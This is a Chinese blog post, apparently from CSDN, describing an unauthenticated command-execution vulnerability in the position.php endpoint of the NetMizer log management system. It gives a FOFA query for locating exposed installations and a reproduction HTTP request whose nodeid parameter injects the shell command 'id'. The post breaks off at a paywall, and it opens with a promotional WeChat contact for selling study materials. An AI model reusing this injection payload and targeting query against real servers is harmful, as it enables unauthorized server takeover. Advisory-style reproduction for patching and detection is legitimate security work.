网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
产品简介
NetMizer日志管理系统是一款可以记录流经设备的所有会话日志,并将其传送到外部的管理中心上的系统。
漏洞描述
NetMizer日志管理系统position.php接口处存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,获取服务器权限。
fofa
app=”NetMizer-日志管理系统”
漏洞复现
GET /data/search/position.php?action=file&nodeid=|id%3E1.txt HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; W
最低0.47元/天 解锁文章
扫一扫
124
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
